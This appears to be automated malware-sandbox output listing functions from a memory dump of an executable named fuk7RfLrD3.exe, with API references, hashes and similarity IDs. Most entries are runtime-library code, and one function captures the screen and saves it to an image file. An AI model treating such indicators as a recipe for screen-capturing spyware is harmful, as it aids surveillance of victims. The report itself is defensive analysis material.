std::_Lockit::_Lockit.LIBCPMT ref: 00404D59
int.LIBCPMT ref: 00404D70

Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D

std::locale::_Getfacet.LIBCPMT ref: 00404D79
std::_Facet_Register.LIBCPMT ref: 00404DAA
std::_Lockit::~_Lockit.LIBCPMT ref: 00404DC0
__CxxThrowException@8.LIBVCRUNTIME ref: 00404DDE

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
Instruction ID: 1dda4c75b92fe2b5e69280e9b804bb78dd99b554210e3ff263920cc003329bbf
Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
Instruction Fuzzy Hash: 7A11A3B19001249BCB15EBA0C841AEE77B4AF54319F20053EE912B72D2DB7C9A0587DD

Function 0040C17F Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C190
int.LIBCPMT ref: 0040C1A7

Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D

std::locale::_Getfacet.LIBCPMT ref: 0040C1B0
std::_Facet_Register.LIBCPMT ref: 0040C1E1
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C1F7
__CxxThrowException@8.LIBVCRUNTIME ref: 0040C215

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
Instruction ID: fd9d6ee1f820b304f7f26aef446794e7afe4742a0815df37dede75514b3fc441
Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
Instruction Fuzzy Hash: C8117371D00229DBCB14EBA0C885AEE7764AF54315F20453EE411BB2D2DB7C9A05CB99

Function 004054C8 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004054D9
int.LIBCPMT ref: 004054F0

Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D

std::locale::_Getfacet.LIBCPMT ref: 004054F9
std::_Facet_Register.LIBCPMT ref: 0040552A
std::_Lockit::~_Lockit.LIBCPMT ref: 00405540
__CxxThrowException@8.LIBVCRUNTIME ref: 0040555E

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
Instruction ID: af26afd1e9f0003da21f47bd393f770a5ce721ed4ca6619ce042a6dd0fbef1f6
Opcode Fuzzy Hash: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
Instruction Fuzzy Hash: 8711A071900628ABCB10EBA4CC41AAE7770AF54319F60053EE815BB2D2DB7C9E458F9C

Function 00404E59 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404E60

Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EAB
__Getcoll.LIBCPMT ref: 00404EBA
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ECA

Strings

\J@, xrefs: 00404EB4

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID: \J@
API String ID: 1836011271-3870157017
Opcode ID: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
Instruction ID: fdee6073741f171039223b21022534e6c74e6b1a9002e69b8caf09e8127dea3b
Opcode Fuzzy Hash: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
Instruction Fuzzy Hash: 1E0169719102099FDB10EFA5C441B9DB7B0FF44319F00803EE145BB6C1DB789544CB99

Function 0042FED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002), ref: 0042FEF4
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF07
FreeLibrary.KERNEL32(00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000), ref: 0042FF2A

Strings

CorExitProcess, xrefs: 0042FEFF
mscoree.dll, xrefs: 0042FEED

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
Instruction ID: 04c50191246c36c7712c7b2292fbce18726cdb65abb1a7ec348a7059dfc2f8e8
Opcode Fuzzy Hash: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
Instruction Fuzzy Hash: D8F0C831A10218BBDB109F90DD09B9EBFB4EF05B12F510076F805A2290CF795E44CB8C

Function 0041CDFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE11
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE35
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE48
__CxxThrowException@8.LIBVCRUNTIME ref: 0041CE56

Strings

pScheduler, xrefs: 0041CE40

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 3657713681-923244539
Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
Instruction ID: eb07aeb186abff06dd5fb113d00e985a326b9016228af1cb3add82d84dc8ee7b
Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
Instruction Fuzzy Hash: 56F05935A40704A3C714FB05DC92CDEB3799E90718760812FE40663182DB7CAD8AC29D

Function 0042B0F6 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
Instruction ID: 170f1839d68b6508eaaaec35cfa06bac438a8aba58ef65257e70e7e464c4b835
Opcode Fuzzy Hash: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
Instruction Fuzzy Hash: 3B71AF31B00266DBCB21CF95E884ABFBB75EF41360B98426BE81067290DB749D45C7E9

Function 00430A34 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9

_free.LIBCMT ref: 00430B3F
_free.LIBCMT ref: 00430B56
_free.LIBCMT ref: 00430B75
_free.LIBCMT ref: 00430B90
_free.LIBCMT ref: 00430BA7

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
Instruction ID: 2fc0cbae349d2941fff749f5b49d8ba5872ca9652a97fa93675838e70d9d8155
Opcode Fuzzy Hash: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
Instruction Fuzzy Hash: 3F51D131A00304AFEB219F69D851B6BB7F4EF5C724F14566EE809D7251E739E901CB88

Function 004314CB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043153D
_free.LIBCMT ref: 0043155D

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
Instruction ID: 2c394445bd20a04972dd2082f140732d1460e75e39bee70d4e52ced8c5000be3
Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
Instruction Fuzzy Hash: 7A41C432A00304ABCB10DF78C981A5EB7E5EF89714F15456AE616EB391DB35ED01CB88

Function 0043688D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0EA,00000000,00000000,0042D928,?,0042D928,?,00000001,0042D0EA,23E85006,00000001,0042D928,0042D928), ref: 004368DA
__alloca_probe_16.LIBCMT ref: 00436912
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436963
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436975
__freea.LIBCMT ref: 0043697E

Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
Instruction ID: d963c907df35f4e1b8a381e23a898db453a996a2d0481b790983a8c47d787b2f
Opcode Fuzzy Hash: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
Instruction Fuzzy Hash: 5F31F072A0021AABDF259F65DC41EAF7BA5EF44710F15422AFC04D7290EB39CD54CB94

Function 0041AEB6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041AEDB

Part of subcall function 00410F11: _SpinWait.LIBCONCRT ref: 00410F29

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEEF
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF21
List.LIBCMT ref: 0041AFA4
List.LIBCMT ref: 0041AFB3

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
Instruction ID: 8a1b27d7ac99c42c423c038c6da62c4f09041a57878ada6c0d5966c490a343f4
Opcode Fuzzy Hash: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
Instruction Fuzzy Hash: 76318B71A02719DFCB10EFA5D5915EEB7B1BF04308F04006FE80167242DB796DA5CB9A

Function 0040202E Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402060
GdipAlloc.GDIPLUS(00000010), ref: 00402068
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 00402083
GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020AD
GdiplusShutdown.GDIPLUS(?), ref: 004020D9

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
String ID:
API String ID: 2357751836-0
Opcode ID: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
Instruction ID: 3210944159f0fc98eb109693a3395d5946c9c878d3acb397b58b4dcf5ef0325c
Opcode Fuzzy Hash: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
Instruction Fuzzy Hash: E72171B5A0031AAFCB10DF65DD459AFFBB8FF48741B104036EA02E3290D7759901CBA8

Function 00417910 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041272D: TlsGetValue.KERNEL32(?,?,00410B4B,00412C58,00000000,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412733

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041793A

Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FCA
Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FE3
Part of subcall function 00420FA3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421059
Part of subcall function 00420FA3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421061

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417948
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417952
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041795C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041797A

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
Instruction ID: 571f4fa900913ae9ac1b624b88cebae7c96a5b4968f9dadd54c27da6e91ea8e9
Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
Instruction Fuzzy Hash: B7F0F671A0421467CA15B737A8529EEB7669F90764B40012FF41193292DFAC9E9886CD

Function 00439E35 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00439E4D

Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482

_free.LIBCMT ref: 00439E5F
_free.LIBCMT ref: 00439E71
_free.LIBCMT ref: 00439E83
_free.LIBCMT ref: 00439E95

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: d2eb3a6f69ed6479eb379d103aeec45d7d0be428363b37fe18b93f123c88dda9
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: E2F04F32905300A7A621EF59E487C1773D9BB08712F68694BF00CD7751CB79FC808A5D

Function 0043171A Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431738

Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482

_free.LIBCMT ref: 0043174A
_free.LIBCMT ref: 0043175D
_free.LIBCMT ref: 0043176E
_free.LIBCMT ref: 0043177F

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 641b2a1348aedb00c037ff60dfb94c9ddf1ba1fe668fd8dfad71f65212485368
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: D8F03070C003109BAA236F15AC414053B60BF2D727B15626BF40697273CB38D952DF8E

Function 0041CCB5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCBF
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CCF0
GetCurrentThread.KERNEL32 ref: 0041CCF9
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD0C
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD15

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: c05db364d3e23aa36edd3e4f9db1c19a47e3778ae9c6089a54b2af47d917b565
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 0EF0A776240500AB8625FF22F9518F77776EFC4715310091EE44B07651DF29ADC2DB6A

Function 0043430B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434464
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434479

Strings

BC, xrefs: 00434386
BC, xrefs: 00434473

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: BC$BC
API String ID: 885266447-2490606219
Opcode ID: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
Instruction ID: b88449fc46bca28f45784ded13f8a3cce66366d25dc88dae471b8c9c35daa9d8
Opcode Fuzzy Hash: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
Instruction Fuzzy Hash: 61518F71A00208AFCB14DF59C884AAEBBB2EFD8314F19C26AE81897361D775ED51CB44

Function 0042F708 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\fuk7RfLrD3.exe,00000104), ref: 0042F743
_free.LIBCMT ref: 0042F80E
_free.LIBCMT ref: 0042F818

Strings

C:\Users\user\Desktop\fuk7RfLrD3.exe, xrefs: 0042F73A, 0042F741, 0042F770, 0042F7A8

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\fuk7RfLrD3.exe
API String ID: 2506810119-851793361
Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction ID: 9cabfb70e7d1101f7aa6931033736f2f7250cd8eb994997f94c6a7917a9720ec
Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction Fuzzy Hash: 7631B371B00228AFDB21DF9AAC8089FBBFCEF95314B90407BE80597211D7749E45CB99

Function 00428DBC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
ExitThread.KERNEL32 ref: 0042DFCA

Strings

<(@, xrefs: 0042DFBC

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: <(@
API String ID: 3213686812-4189137628
Opcode ID: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
Instruction ID: c42ad4fc6a3a459dd0b6f73910b388841d309234efd3d08c580d18ad64b54486
Opcode Fuzzy Hash: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
Instruction Fuzzy Hash: CCF02761B8432635FA2037B27D0BBAB19150F14B0DF96003FFF0A995C3DEAC955040AD

Function 0042DF6D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
ExitThread.KERNEL32 ref: 0042DFCA

Strings

<(@, xrefs: 0042DFBC, 0040F1DD

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: <(@
API String ID: 3213686812-4189137628
Opcode ID: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
Instruction ID: 8d9534a8efac39963163d02413269ee71f33911fb9a211fcd458cde81c8fda17
Opcode Fuzzy Hash: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
Instruction Fuzzy Hash: 08F0A061B8431635FA203BA1BD0BB9619254F14B09F56002BBE0AA95D2DAA9955041AD

Function 004242B7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242E9
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004242FB
__CxxThrowException@8.LIBVCRUNTIME ref: 00424309

Strings

pScheduler, xrefs: 004242F3

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 1381464787-923244539
Opcode ID: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
Instruction ID: 0ab47ed57e3114165a5b8518f1ff4cdc14a790a58e52e99d458785ee7c9320ad
Opcode Fuzzy Hash: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
Instruction Fuzzy Hash: E7F0A731B01224A7CB18FB56E852D9E73A99E40304791826FF806A3182DFBCA948C65D

Function 0041E60D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E62F
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E642
__CxxThrowException@8.LIBVCRUNTIME ref: 0041E650

Strings

pContext, xrefs: 0041E63A

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1990795212-2046700901
Opcode ID: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
Instruction ID: 74844cc6af7f8c94541e855de6513edd01ccc4ed259e70f51b8aa0ea99782ad2
Opcode Fuzzy Hash: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
Instruction Fuzzy Hash: 9EE06139B0011427CB04FB65DC06C5DB7A8AEC0714390413BF905A3381DFB8AD0585CC

Function 00415D7A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DAA
__CxxThrowException@8.LIBVCRUNTIME ref: 00415DB8

Strings

pScheduler, xrefs: 00415DA2
version, xrefs: 00415D8F

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
